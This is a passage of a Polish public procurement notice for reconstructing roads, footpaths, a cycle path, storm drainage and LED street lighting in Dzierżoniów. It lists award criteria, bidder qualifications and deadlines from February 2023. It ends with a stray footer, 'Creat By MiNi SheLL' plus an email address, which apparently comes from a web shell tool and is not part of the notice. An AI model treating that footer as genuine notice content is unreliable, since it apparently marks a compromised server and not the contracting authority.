oświetleniowe itd. W przypadku rezygnacji przez Zamawiającego <br/>z materiałów porozbiórkowych Wykonawca wywiezie je na składowisko odpadów i poniesie koszty ich składowania i utylizowania, <br/>Szczegółowy opis przedmiotu zamówienia znajduje się w SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45232130-2 - Roboty budowlane w zakresie rurociągów do odprowadzania wody burzowej</p> <p class="mb-0">45231400-9 - Roboty budowlane w zakresie budowy linii energetycznych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">190 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą zostanie uznana oferta Wykonawcy, który spełnił<br/>wszystkie postawione w niniejszej SWZ warunki, nie podlega wykluczeniu z postępowania oraz uzyska łącznie największą liczbę<br/>punktów stanowiących sumę punktów przyznanych w ramach każdego z podanych kryteriów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Przedłużenie okresu gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1.1.1. nie podlegają wykluczeniu,<br/>1.1.2. spełniają warunki udziału w postępowaniu.<br/>1.2. Na podstawie art. 112 ustawy Pzp, Zamawiający określa warunki udziału w postępowaniu dotyczące:<br/>1.2.1. zdolności do występowania w obrocie gospodarczym - Zamawiający nie formułuje warunku udziału w postępowaniu w tym zakresie;<br/>1.2.2.	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów - Zamawiający nie formułuje warunku udziału w postępowaniu w tym zakresie;<br/>1.2.3.	sytuacji ekonomicznej lub finansowej - Zamawiający nie formułuje warunku udziału w postępowaniu w tym zakresie <br/>1.2.4.	zdolności technicznej lub zawodowej - Zamawiający uzna, że Wykonawca spełnia warunek w zakresie zdolności technicznej lub zawodowej, jeżeli Wykonawca:<br/>1.2.4.1. wykonał należycie w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie co najmniej 2 roboty budowlane w zakresie budowy lub/i remontu lub/i przebudowy dróg o nawierzchni z betonu asfaltowego na powierzchni min. 2 000 m2 każda.<br/>1.2.4.2. skieruje do realizacji zamówienia następujące osoby, umożliwiające realizację zamówienia na odpowiednim poziomie jakości tj.:<br/> - w zakresie nadzoru nad realizacją robót budowlanych osoby posiadające uprawienia do kierowania robotami budowlanymi:<br/>- jedną osobą posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności drogowej;<br/>- jedną osobą posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych;<br/>- jedną osobą posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych.<br/>Przez uprawnienia do pełnienia samodzielnych funkcji w budownictwie zamawiający rozumie<br/>uprawnienia wydane na podstawie aktualnie obowiązującej ustawy – Prawo budowlane<br/>(t.j. Dz. U. z 2021 r., poz. 2351 ze zm.) lub odpowiadające im ważne uprawnienia wydane na<br/>podstawie wcześniej obowiązujących przepisów albo odpowiednie kwalifikacje uzyskane za<br/>granicą, uznane w Polsce na podstawie przepisów o zasadach uznawania kwalifikacji<br/>zawodowych nabytych w państwach członkowskich Unii Europejskiej.<br/>Uwaga! W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>• warunek określony w pkt. 1.2.4.1. musi być spełniony w całości przez co najmniej jednego<br/>z Wykonawców wspólnie ubiegających się o zamówienie (jeden lub każdy z podmiotów musi<br/>posiadać samodzielnie wymagane doświadczenie),<br/>• warunek określony w pkt. 1.2.4.2. zostanie spełniony jeżeli co najmniej jeden z Wykonawców<br/>wspólnie ubiegających się o zamówienie potwierdzi, iż spełnia ww. warunek albo Wykonawcy<br/>łącznie wykażą dysponowanie osobami.<br/>W odniesieniu do wyżej wymienionych warunków Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane, do realizacji których te zdolności są wymagane.<br/>1.4. Wykonawcy wspólnie ubiegający się o zamówienie dołączają do oferty oświadczenie, o którym mowa w art. 117 ust. 4 Ustawy (wzór stanowi załącznik nr 5 do SWZ), w którym wskażą które roboty budowlane zostaną wykonane przez poszczególnych wykonawców w odniesieniu do spełnienia ww. warunku.<br/>1.5. W przypadku, gdy wykonawca polega na zdolnościach innego podmiotu w zakresie doświadczania, warunek określony w pkt. 1.2.4.1. musi być spełniony w całości przez podmiot udostępniający zasób.<br/>1.6. W przypadku, gdy wykonawca polega na zdolnościach innego podmiotu, podmiot udostępniający zasób zobowiązany będzie zrealizować roboty budowlane, których wskazane zdolności dotyczą (podwykonawstwo).<br/>1.7. Oceniając zdolność techniczną lub zawodową Zamawiający może, na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie wykonawcy<br/>brak podstaw do wykluczenia z postępowania na podstawie przesłanek określonych w art. 108 ust. 1 ustawy Pzp (wzór stanowi<br/>załącznik nr 2 do SWZ). Zgodnie z art. 274 ust. 1 ustawy Pzp, Zamawiający przed wyborem najkorzystniejszej oferty wezwie<br/>Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnego na<br/>dzień złożenia, następującego podmiotowego środka dowodowego: Potwierdzenie aktualności informacji zawartych w oświadczeniu,<br/>o którym mowa w rozdziale IV ust. 1 pkt. 1.2 SWZ w zakresie podstaw wykluczenia z postępowania wskazanych przez<br/>Zamawiającego - załącznik nr 9 do SWZ; (dokument ten składa każdy z Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia/podmiot udostępniający zasoby).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zgodnie z art. 274 ust. 1 ustawy Pzp, Zamawiający przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia, następujących podmiotowych środków dowodowych:<br/>2.1.1. wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty. Wzór wykazu robót budowlanych stanowi załącznik nr 6 do SWZ.<br/>2.1.2. Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych, wykonywanych wspólnie z innymi Wykonawcami, wykaz, o którym mowa powyżej dotyczy robót budowlanych, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył;<br/>2.1.3. wykazu z osobami, skierowanymi przez Wykonawcę do realizacji zamówienia publicznego, odpowiedzialnych za projektowanie i kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnego do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nich czynności oraz informacją o podstawie do dysponowania tymi osobami. Wzór wykazu z osobami skierowanymi do realizacji zamówienia stanowi załącznik nr 7 do SWZ;<br/>3. 2.1.4. Potwierdzenie aktualności informacji zawartych w oświadczeniu, o którym mowa w rozdziale <br/>IV ust. 1 pkt. 1.2 SWZ w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego - załącznik nr 9 do SWZ; (dokument ten składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia/podmiot udostępniający zasoby).</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Oferta składana jest pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem<br/>zaufanym lub podpisem osobistym. Do złożenia oferty konieczne jest posiadanie przez osobę upoważnioną do reprez.<br/>Wyk.:ważnego kwalifikowanego podpisu elektronicznego, wystawionego przez dostawcę kwalifikowanej usługi zaufania,<br/>będącego pod. świad. usługi certyfikacyjne spełniające wymogi bezpieczeństwa określone w ustawie o usługach zaufania<br/>(...), zgodnie z art. 3 pkt 14a ustawy o informatyzacji działalności podmiotów realizujących zadania publiczne lub podpisu<br/>osobistego, zgodnie z art. 2 ust. 1 pkt 9 ustawy o dowodach osobistych. Wykonawca dołącza do oferty oświadczenie o<br/>niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu w zakresie wskazanym w rozdziale III SWZ.<br/>Oświadczenie to stanowi dowód potwierdzający brak podstaw wykluczenia oraz spełnianie warunków udziału w<br/>postępowaniu, na dzień składania ofert, tymczasowo zastępujący wymagane podmiotowe środki dowodowe, wskazane w<br/>rozdziale IV ust. 2 pkt 2.1 SWZ. Ośw. należy złożyć zgodnie ze wzorem stanowiącym załącznik nr 2 do SWZ. Ośw., o<br/>którym mowa w ust. 1.2 składają odrębnie:1) Wykonawca/każdy spośród Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia. W takim przypadku ośw. potwierdza brak podstaw wykluczenia Wykonawcy oraz spełnianie warunków udziału<br/>w postępowaniu w zakresie, w jakim każdy z Wyk.wykazuje spełnianie warunków udziału w postępowaniu;2) podmiot<br/>udostępniający zasoby, na którego potencjał powołuje się Wyk., celem potwierdzenia spełnienia warunków udziału w<br/>postępowaniu. W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia podmiotu oraz spełnianie warunków<br/>udziału w postępowaniu w zakresie, w jakim podmiot udostępnia swoje zasoby Wyk..Do oferty Wyk.zobowiązany jest<br/>dołączyć wykaz rozwiązań równoważnych (o ile dotyczy) – wyk., który powołuje się na rozwiązania równoważne, jest<br/>zobowiązany wykazać, że oferowane przez niego rozwiązanie spełnia wymagania określone przez zamawiającego. W takim<br/>przypadku wyk. załącza do oferty wykaz rozwiązań równoważnych z jego opisem lub normami.Do oferty Wyk. zobowiązany<br/>jest załączyć również:1) dowód wniesienia wadium – W przypadku wniesienia wadium w poręczeniu lub gwarancji powinno<br/>ono obejmować przekazanie tego dokumentu w takiej formie, w jakiej został on ustanowiony przez gwaranta, np. oryginału<br/>dokumentu podpisanego kwalifikowanym podpisem elektronicznym przez jego wystawcę.2) pełnomocnictwo lub inny<br/>dokument potwierdzający umocowanie do reprezentowania Wyk., gdy umocowanie osoby składającej ofertę nie wynika z<br/>dokumentów rejestrowych / dokument potwierdzający, że osoba działająca w imieniu Wyk. jest umocowana do jego<br/>reprezentowania - odpis lub informacja z KRS, CEiDG lub innego wł. rejestru, 3) zobowiązanie, o którym mowa w rozdziale<br/>I, ust. 5 pkt. 5.3 oraz 5.4 SWZ w przypadku polegania na zasobach podmiotu udostępniającego zasób Wyk.,4) w przypadku<br/>Wyk. wspólnie ubiegających się o udzielenie zamówienia: pełnomocnictwo, w przypadku Wyk. wspólnie ubiegających się o<br/>udzielenie zamówienia, z treści którego będzie wynikało umocowanie do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>Pełnomocnictwo powinno zawierać w szczególności wskazanie:• postępowania o zamówienie publiczne, którego dotyczy,•<br/>wszystkich Wyk. ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu<br/>siedziby,ustanowionego pełnomocnika oraz zakresu jego pełnomocnictwa;oświadczenie, o którym mowa w rozdziale I ust 4,<br/>pkt 4.4 SWZ.W przypadku gdy Wyk. powierza wykonanie części zamówienia podwykonawcy, zobowiązany jest do<br/>wykazania w załączniku nr 3 do SWZ informacji o części zamówienia, której wykonanie zamierza powierzyć podwyk. oraz<br/>podania nazw ich firm, o ile są już znane. wskazał dane umożliwiające dostęp do tych dokumentów. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> a) Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w<br/>postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia<br/>publicznego; <br/>b) Wszelka korespondencja będzie prowadzona przez Zamawiającego wyłącznie z pełnomocnikiem; c) Do<br/>oferty należy załączyć pełnomocnictwo dla ustanowionego pełnomocnika; d) Wykonawcy składają jedną ofertę, do której<br/>załączone będą dokumenty, o których mowa w SWZ; e) Wykonawca winien przedłożyć dokumenty i<br/>oświadczenia wymienione w rozdziale IV SWZ dotyczące każdego partnera konsorcjum osobno w zakresie tam wskazanym;<br/>f) Oświadczenia i dokumenty wspólne, takie jak np.: oferta cenowa, składa pełnomocnik Wykonawców w imieniu wszystkich;<br/>g) Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie;<br/>h) wszyscy partnerzy będą ponosić odpowiedzialność solidarną za wykonanie umowy zgodnie z jej postanowieniami; i)<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców,<br/>którzy wykonają roboty budowlane, do realizacji których te zdolności są wymagane. Wtedy powinni dołączyć do oferty<br/>oświadczenie (załącznik nr 5 do SWZ), z którego wynika, które roboty budowlane wykonują poszczególni Wykonawcy, j)<br/>przed podpisaniem umowy Wykonawcy składający ofertę wspólną będą mieli obowiązek przedstawić Zamawiającemu<br/>umowę konsorcjum <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający dopuszcza możliwość zmiany umowy zawartej z Wykonawcą. Wszystkie dopuszczalne zmiany postanowień<br/>umowy oraz określenie rodzaju, zakresu i warunków zmian zawarte są w § 19 wzoru umowy (stanowiącym załącznik nr 10 do<br/>SWZ). <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-02-09 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Za pośrednictwem Platformy Zakupowej: https://dzierzoniow.ezamawiajacy.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-02-09 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-03-10</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wykonawcy oraz innemu podmiotowi, jeżeli ma lub miał interes w uzyskaniu zamówienia oraz poniósł lub może ponieść<br/>szkodę w wyniku naruszenia przez Zamawiającego przepisów ustawy Pzp, przysługują środki ochrony prawnej określone w<br/>dziale IX ustawy Pzp. Zamawiający wykluczy wykonawcę w<br/>przypadku zaistnienia okoliczności przewidzianych postanowieniami art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o<br/>szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie<br/>bezpieczeństwa narodowego (Dz.U. z 2022 r., poz. 835).<br/><br/>Pełna nazwa zamówienia: Wykonanie robót budowlanych w zakresie wymiany konstrukcji dróg, krawężników, nawierzchni, przebudowy ciągów pieszych, budowę ścieżki rowerowej, budowę i przebudowę miejsc parkingowych, budowę kanalizacji deszczowej oraz budowę oświetlenia ulicznego typu LED, <br/>w ramach zadania inwestycyjnego pn.: „Przebudowa dróg dojazdowych do Szkoły Podstawowej nr 3 w Dzierżoniowie oraz ul. Szkolnej<br/> i ul. 11-Listopada (od ul. T. Kościuszki do skrzyżowania z ul. Szkolną)”

Creat By MiNi SheLL
Email: jattceo@gmail.com